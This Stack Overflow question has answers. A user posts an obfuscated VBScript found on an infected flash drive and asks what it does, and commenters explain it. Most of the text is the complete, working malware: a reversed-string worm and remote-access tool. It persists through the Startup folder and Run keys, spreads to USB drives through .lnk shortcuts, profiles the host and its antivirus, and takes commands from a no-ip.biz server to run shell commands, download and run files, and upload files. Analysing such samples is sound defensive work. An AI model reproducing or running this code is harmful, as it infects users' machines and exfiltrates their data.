3

The file seems to be a virus.

The real files with the script file in the memory flash is hidden and linked with .lnk files that open them and run the script at the same time.

the antivirus alert about VBS/LNK.JENXCUS.Gen Trojan.

what does the code do? it makes a copy to itself in startup folder, even when i delete it.

Dim zvn
Dim dnqeqvrrc_
xs=("""")
n=(vbcrlf)
Function bnowmx()

zvn=zvn&""&n&"noitcnuf dne"&n&"ynamorflladaer = llehsdmc"&n&"fi dne"&n&""&xs&""&xs&" = ynamorflladaer"&n&" esle"&n&"lladaer.rredts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.rredts.cexeo ton fiesle"&n&"lladaer.tuodts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.tuodts.cexeo ton fi"&n&")dmc & "&xs&" c/ %cepsmoc%"&xs&"( cexe.jbollehs = cexeo tes"&n&"ynamorflladaer,cexeo,jboptth mid"&n&")dmc( llehsdmc noitcnuf"&n&"bus dne"&n&"lru redlofeteled.jbo"
zvn=zvn&"metsyselif"&n&"lru elifeteled.jbometsyselif"&n&"txen emuser rorre no"&n&")lru( fafeteled bus"&n&"bus dne"&n&"eurt,7,dip & "&xs&" DIP/ T/ F/ llikksat"&xs&" nur.jbollehs"&n&"txen emuser rorre no"&n&")dip( ssecorptixe bus"&n&"noitcnuf dne"&n&"txen"&n&"retilps & htapelbatucexe.metijbo & ssecorpmune = ssecorpmune"&n&""&xs&"|"&xs&" & dissecorp.metijbo & ssecorpmune = ssecorpmune    "&n&""&xs&"|"&xs&" & eman.metijbo & ssecorpmune = ssecorpmune   "&n&"smetiloc ni metijbo hcae rof"&n&"metijbo mid"&n&")84,,"&xs&"ssecorp_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&"txen emuser rorre no"&n&")( ssecorpmune noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"retilps & setubirtta.elif & "&xs&"|"&xs&" & "&xs&"f"&xs&" & "&xs&"|"&xs&" &  ezis.elif & "&xs&"|"&xs&" & eman.elif & fafmune = fafmune"&n&"selif.)ridmune( redlofteg.jbometsyselif ni elif hcae  rof"&n&"txen"&n&"retilps & setubirtta.redlof & "&xs&"|"&xs&" & "&xs&"d"&xs&" & "&xs&"|"&xs&" & "&xs&""&xs&" & "&xs&"|"&xs&" & eman.redlof & fafmune = fafmune"&n&"sredlofbus.)ridmune( redlofteg.jbometsyselif ni redlof hcae  rof"&n&"retilps & ridmune = fafmune"&n&")ridmune( fafmune noitcnuf"&n&"noitcnuF dne"&n&"txen"&n&"fi dne"&n&"retilps & epytevird.evird & "&xs&"|"&xs&" & htap.evird & revirdmune = revirdmune"&n&"neht eurt = ydaersi.evird   fi"&n&"sevird.jbometsyselif ni evird hcae  rof"&n&")( revirdmune noitcnuf"&n&"noitcnuf dne"&n&"reffub dnes.jboptth"&n&"eslaf ,lruelif & retilps & "&xs&"gnivcer-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"gni"
zvn=zvn&"hton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.   "&n&"daer. = reffub     "&n&"lruelif elifmorfdaol.  "&n&"nepo."&n&" 1 = epyt."&n&" edaolpumaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = edaolpumaertsjbo  tes"&n&"reffub,edaolpumaertsjbo,jboptth  mid"&n&")lruelif( daolpu noitcnuf"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts( elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht )otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton =  daolnwodmaertsjbo tes"&n&"htiw dne  "&n&"esolc.         "&n&"otevasrts elifotevas.      "&n&"ydobesnopser.daolnwodptthjbo etirw.        "&n&"nepo.      "&n&" 1 = epyt.         "&n&" daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo  tes    "&n&"daolnwodmaertsjbo  mid"&n&"neht 002 = sutats.daolnwodptthjbo  fi"&n&"fi dne"&n&")otevasrts( elifeteled.daolnwodosfjbo"&n&"neht )otevasrts( stsixeelif.daolnwodosfjbo  fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"( tcejboetaerc = daolnwodosfjbo tes"&n&"     "&n&""&xs&""&xs&" dnes.daolnwodptthjbo"&n&"eslaf ,lruelif & retilps & "&xs&"gnidnes-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.daolnwodptthjbo"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&")1 + )"&xs&"\"&xs&",lruelif( verrtsni ,lruelif( dim & ridelif = otevasrts"&n&"fi dne"&n&"ridllatsni = ridelif"&n&" neht "&xs&""&xs&" = ridelif fi"&n&")ridelif,lruelif( daolnwod bus"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts( elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht )otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.       "&n&"otevasrts elifote"
zvn=zvn&"vas.       "&n&"ydobesnopser.daolnwodptthjbo etirw.        "&n&"nepo.      "&n&" 1 = epyt.     "&n&"daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo  tes"&n&"daolnwodmaertsjbo  mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&" "&n&"fi dne"&n&")otevasrts( elifeteled.daolnwodosfjbo"&n&"neht )otevasrts( stsixeelif.daolnwodosfjbo  fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"( tcejboetaerc = daolnwodosfjbo tes"&n&"dnes.daolnwodptthjbo"&n&"eslaf ,knilrts ,"&xs&"teg"&xs&" nepo.daolnwodptthjbo"&n&") "&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&"emanelif & ridllatsni = otevasrts"&n&"lruelif = knilrts"&n&")emanelif,lruelif( redaolnwodetis bus"&n&"noitcnuf dne"&n&"tiuq.tpircsw neht 0 > rebmun.rre  fi"&n&")eslaf ,8, emanllatsni & ridllatsni( eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"raelc.rre"&n&"fI dne"&n&" tiuq.tpircsw"&n&")43(rhC & emanllatsni & ridllatsni & )43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&" neht )htaptrohs.trohsemanllufllatsni( esacl >< )htaptrohs.trohsemanlluftpircs( esacl  fi"&n&")emanllatsni & ridllatsni( elifteg.jbometsyselif  = trohsemanllufllatsni tes"&n&")emanlluftpircs.tpircsw( elifteg.jbometsyselif  = trohsemanlluftpircs tes"&n&"tratspu"&n&"fI dne"&n&"fi dne"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu  ,"&xs&"\"&xs&" &  )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad & "&xs&" - eslaf"&xs&" = gnidaerpsbsu"&n&"esle"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu  ,"&xs&"\"&xs&" &  )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad"
zvn=zvn&" & "&xs&" - eurt"&xs&" = gnidaerpsbsu"&n&"neht )emanllatsni(esacl  & "&xs&"\:"&xs&" = ))2,emanlluftpircs.tpircsw(dim ( esacl fi"&n&"neht "&xs&""&xs&" = gnidaerpsbsu fi"&n&")"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = gnidaerpsbsu"&n&"txen emuser rorre no"&n&"ecnatsni noitcnuf"&n&"noitcnuf dne"&n&""&xs&"va-nan"&xs&" =  ytiruces neht "&xs&""&xs&" =  ytiruces fi"&n&"txen"&n&""&xs&". "&xs&" & emanyalpsid.surivitnajbo &  ytiruces =  ytiruces"&n&"surivitnaloc ni surivitnajbo hcae rof"&n&")0,"&xs&"lqw"&xs&","&xs&"tcudorpsurivitna morf * tceles"&xs&"(yreuqcexe.retnecytirucesjbo = surivitnaloc teS"&n&")cs & "&xs&"\toor\tsohlacol\\:stmgmniw"&xs&"(tcejboteg = retnecytirucesjbo tes"&n&""&xs&"retnecytiruces"&xs&" = cs esle "&xs&"2retnecytiruces"&xs&" = cs neht 6 > noisrevso  fi"&n&")noisrevso( lave = noisrevso"&n&"txen"&n&")i( rtsnoisrev  & noisrevso = noisrevso  "&n&")rtsnoisrev( dnuobu ot 1 = x  rof"&n&""&xs&"."&xs&" & )0( rtsnoisrev = noisrevso"&n&")"&xs&"."&xs&",noisrev.smetiloc( tilps = rtsnoisrev"&n&"txen"&n&")"&xs&"."&xs&",noisrev.metijbo( tilps = rtsnoisrev"&n&"smetiloc ni metijbo hcae rof"&n&")84,,"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&""&xs&""&xs&" = ytiruces"&n&"txen emuser rorre no"&n&" ytiruces noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"fi dne"&n&"rof tixe"&n&"rebmunlairesemulov.ksid = diwh"&n&"neht "&xs&""&xs&" >< rebmunlairesemulov.ksid  fi"&n&"sksid ni ksid hcae rof"&n&")"&xs&"ksidlacigol_23niw morf * tceles"&xs&"( yreuqcexe.toor = sksid tes"&n&")"
zvn=zvn&""&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"txen emuser rorre no"&n&"diwh noitcnuf"&n&"bus dne"&n&"eurt, emanllatsni & putrats,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"eurt,emanllatsni & ridllatsni,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&""&xs&"ZS_GER"&xs&" , )43(wrhc & emanllatsni & ridllatsni & )43(wrhc &  "&xs&" B// exe.tpircsw"&xs&"  ,)0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&""&xs&"ZS_GER"&xs&" , )43(wrhc & emanllatsni & ridllatsni & )43(wrhc & "&xs&" B// exe.tpircsw"&xs&"  ,)0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" etirwger.jbollehs"&n&"txeN emuser rorre no"&n&")( tratspu bus"&n&"noitcnuf dne"&n&"fi dne"&n&"fni = noitamrofni"&n&"esle"&n&"  fni = noitamrofni"&n&"gnidaerpsbsu & fni = fni"&n&"retilps & ytiruces & fni = fni"&n&"retilps & "&xs&"sulp"&xs&" & fni = fni"&n&"txen"&n&"rof tixe"&n&"  retilps & noitpac.ofniso & fni = fni"&n&"so ni ofniso hcae rof"&n&")"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"( yreuqcexe.toor = so tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"retilps & )"&xs&"%emanresu%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs &  fni = fni"&n&" retilps & )"&xs&"%emanretupmoc%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs &  fni = fni"&n&" retilps & diwh = fni"&n&"neht "&xs&""&xs&" = fni  fi"&n&"txen emuser rorre no"&n&"noitamrofni noitcnuf"&n&"noitcnuf dne"&n&"txetesnopser.jboptth ="
zvn=zvn&" tsop"&n&"marap dnes.jboptth"&n&"noitamrofni,"&xs&":tnega-resu"&xs&" redaehtseuqertes.jboptth"&n&"eslaf ,dmc & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&"marap = tsop"&n&")marap, dmc( tsop noitcnuf"&n&"bus dne"&n&"tiuq.tpircsw"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&"txen"&n&"0 = setubirtta.redlof"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&" )htap.elif( elifeteled.jbometsyselif"&n&"esle"&n&"fI dne"&n&")eman.elif & "&xs&"\"&xs&" & htap.evird( elifeteled.jbometsyselif"&n&"esle"&n&") "&xs&"knl."&xs&" & )0(emanelif & "&xs&"\"&xs&" & htap.evird( elifeteled.jbometsyselif"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht )emanllatsni( esacu >< )eman.elif( esacu  fi"&n&"0 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" >< ))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps( esacl  fi"&n&"neht )"&xs&"."&xs&",eman.elif( rtsni  fi"&n&"txen emuser rorre no"&n&"selif.)"&xs&"\"&xs&" & htap.evird ( redlofteg.jbometsyselif ni elif hcae  rof"&n&"neht 1 =  epytevird.evird  fi"&n&"neht 0 >  ecapseerf.evird  fi"&n&"neht eurt = ydaersi.evird  fi"&n&"sevird.jbometsyselif ni evird hcae  rof"&n&"eurt, emanlluftpircs.tpircsw elifeteled.jbometsyselif"&n&"eurt, emanllatsni & putrats elifeteled.jbometsyselif"&n&")0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" eteledger.jbollehs"&n&")0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" eteledger.jbollehs"&n&"emanredlof mid"&n&"emanelif mid"&n&"txen e"
zvn=zvn&"muser rorre no"&n&"llatsninu bus"&n&"bus dne"&n&"raelc.rre"&n&"txen"&n&"fi dne"&n&"fI dne"&n&"fI dne"&n&"txen"&n&")(evas.jboknl"&n&"fi dne"&n&"nociredlof = noitacolnoci.jboknl"&n&" esle"&n&"htap.redlof = noitacolnoci.jboknl"&n&"neht 0 = )"&xs&","&xs&",nociredlof( rtsni  fi"&n&" )"&xs&"\nocitluafed\redlof\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = nociredlof"&n&""&xs&"tixe&"&xs&"& ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",eman.redlof(ecalper & "&xs&" rerolpxe trats&"&xs&" & ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"exe.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&" )"&xs&"knl."&xs&" & emanredlof &  "&xs&"\"&xs&" & htap.evird( tuctrohsetaerc.jbollehs = jboknl tes"&n&"eman.redlof = emanredlof"&n&"4+2 = setubirtta.redlof"&n&"rof tixe neht redlofknl ton fi"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&")(evas.jboknl"&n&"fi dne"&n&"nocielif = noitacolnoci.jboknl"&n&" esle"&n&"htap.elif = noitacolnoci.jboknl"&n&"neht 0 = )"&xs&","&xs&",nocielif( rtsni  fi"&n&" )"&xs&"\nocitluafed\"&xs&" & )"&xs&"\"&xs&" &)))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps & "&xs&".\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs & "&xs&"\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = nocielif"&n&""&xs&"tixe&"&xs&"& ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",eman.elif(ecalper & "&xs&" trats&"&xs&" & ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"ex"
zvn=zvn&"e.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&" )"&xs&"knl."&xs&" & )0( emanelif &  "&xs&"\"&xs&" & htap.evird( tuctrohsetaerc.jbollehs = jboknl tes"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht )emanllatsni( esacu >< )eman.elif( esacu  fi"&n&"4+2 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" >< ))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu( )"&xs&"."&xs&" ,eman.elif(tilps( esacl  fi"&n&"neht )"&xs&"."&xs&",eman.elif( rtsni  fi"&n&"rof tixe neht elifknl ton fi"&n&"seliF.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"fi dne"&n&"4+2 = setubirtta.)emanllatsni &  "&xs&"\"&xs&" & htap.evird(elifteg.jbometsyselif"&n&"neht  )emanllatsni & "&xs&"\"&xs&" & htap.evird( stsixeelif.jbometsyselif  fi"&n&"eurt,emanllatsni & "&xs&"\"&xs&" & htap.evird , emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"neht 1 =  epytevird.evird  fi"&n&"neht 0 >  ecapseerf.evird  fi"&n&"neht eurt = ydaersi.evird  fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"tratspu"&n&"nociredlof mid"&n&"nocielif mid"&n&"emanredlof mid"&n&"emanelif mid"&n&"jboknl mid"&n&"txen emuser rorre no"&n&"llatsni bus"&n&"dnew"&n&"peels peels.tpircsw"&n&"tceles dne"&n&"        )marap( lave = peels"&n&")1( dmc = marap"&n&""&xs&"peels"&xs&"  esac"&n&" )marap( ssecorptixe"&n&")1( dmc = marap"&n&""&xs&"ssecorp-tixe"&xs&"  esac"&n&" )marap( fafeteled"&n&")1( dmc = marap"&n&""&xs&"eteled"&xs&"  esac"&n&"  )marap( llehsdmc,"&xs&"llehs-dmc-si"&xs&" tsop"&n&")1( dmc = marap"&n&""&xs&"llehs-dmc"&xs&"  esac"&n&"   ssecorpmune,"&xs&"ssecorp-mune-si"&xs&" tsop"&n&""&xs&"ssecorp-mune"&xs&"  esac"&n&")marap( fafmune,"&xs&"faf-mune-si"&xs&" tsop"&n&")1( dmc = marap"&n&""&xs&"faf-mune"&xs&"  esac"&n&"  revirdmune,"&xs&"revir"
zvn=zvn&"d-mune-si"&xs&" tsop"&n&""&xs&"revird-mune"&xs&"  esac"&n&")marap( daolpu"&n&")1( dmc = marap"&n&""&xs&"vcer"&xs&" esac"&n&")2( dmc,)1( dmc redaolnwodetis"&n&""&xs&"dnes-etis"&xs&" esac"&n&")2( dmc,)1( dmc daolnwod"&n&""&xs&"dnes"&xs&" esac"&n&"llatsninu"&n&""&xs&"llatsninu"&xs&" esac"&n&" tiuq.tpircsw"&n&")43(rhc & emanllatsni & ridllatsni & )43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&"esolc.ecnoeno"&n&"marap etirw.ecnoeno"&n&")eslaf ,2, emanllatsni & ridllatsni( eliftxetnepo.jbometsyselif  = ecnoeno tes"&n&"esolc.ecnoeno"&n&")1( dmc = marap"&n&""&xs&"etadpu"&xs&" esac"&n&"marap etucexe"&n&")1( dmc = marap"&n&""&xs&"etucecxe"&xs&" esac"&n&")0( dmc esac tceles"&n&")retilps,esnopser( tilps = dmc"&n&")"&xs&""&xs&","&xs&"ydaer-si"&xs&"( tsop = esnopser"&n&""&xs&""&xs&" = esnopser"&n&"llatsni"&n&"eurt elihw"&n&"ecnatsni"&n&"txen emuser rorre no"&n&"ecnoeno mid"&n&""&xs&""&xs&" = etadtrats"&n&""&xs&""&xs&" = gnidaerpsbsu"&n&""&xs&""&xs&" = ofni"&n&"marap mid"&n&"dmc mid"&n&"esnopser mid"&n&" 0005 = peels"&n&""&xs&">"&xs&" & "&xs&"|"&xs&" & "&xs&"<"&xs&" = retilps"&n&""&xs&"\"&xs&" & )"&xs&"%pmet%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni  neht )ridllatsni(stsixeredlof.jbometsyselif ton fi"&n&""&xs&"\"&xs&" & )ridllatsni(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni"&n&""&xs&"\"&xs&" & )"&xs&"putrats"&xs&"( sredloflaiceps.jbollehs = putrats"&n&"emantpircs.tpircsw = emanllatsni"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"jboptth mid"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = jbometsyselif tes"&n&"jbometsyselif mid"&n&")"&xs&"llehs.tpircsw"&xs&"(tcejboetaerc.tpircsw = jbollehs tes"&n&" jbollehs mid"&n&"eurt = redlofknl"&n&"eurt = elifknl"&n&""&xs&"%pmet%"&xs&" = ridllatsni"&n&"7711 = trop"&n&""&xs&"zib.pi-on.naybil"&xs&" = tsoh"&n&"reDoCXdaME'"

for azcujbz=(((len)(zvn)))to(1)Step(-1)
ypqmwkll=(mid(zvn,azcujbz,1))
dnqeqvrrc_=(dnqeqvrrc_&ypqmwkll&szauuy_l_vr)
next
bnowmx=dnqeqvrrc_
End Function 
Executeglobal(cstr(bnowmx()))
'EMadXCoDer,www.dev-point.com
TessellatingHeckler
  • 27,511
  • 4
  • 48
  • 87
Ahmed
  • 186
  • 1
  • 2
  • 10
  • 6
    I'm voting to close this question as off-topic because it is not a question about a programming issue. – Smandoli Oct 27 '15 at 20:38
  • 1
    Likely something malicious. Not necessarily though. It's just heavily obfuscated. Agreed, off-topic though. – CollinD Oct 27 '15 at 20:40
  • 2
    It makes a string and then reverses it and then executes the reversed string. You could just replace the executeglobal with a message box to see the code that is about to be executed. But that's not the problem! The problem is that it is too late. If it keeps recreating itself when you delete it then your system is already infected. – Jerry Jeremiah Oct 27 '15 at 20:45
  • 1
    It's not very heavily obfuscated, it's mostly backwards - paste it into http://string-functions.com/reverse.aspx or similar and it's VBScript code involving reading disks and folders and free space, checking OS version, querying for installed antivirus, connecting to a server on a free-DNS service and downloading something and saving it, writing things to the registry... – TessellatingHeckler Oct 27 '15 at 20:47
  • thank you for your responses, where should i posted that question in http://security.stackexchange.com/? – Ahmed Oct 27 '15 at 21:01

1 Answers1

4

The code installs itself in the user's startup folder and then sets the both Run registry keys to execute the script when the machine boots. When run, the script starts a loop that executes forever. Each time through the loop it reinstalls itself and then opens a socket to libyan.no-ip.biz and asks for instructions. The response instruction can be many things including having the script send information that is on the drive or download and execute arbitrary code.

Jerry Jeremiah
  • 9,045
  • 2
  • 23
  • 32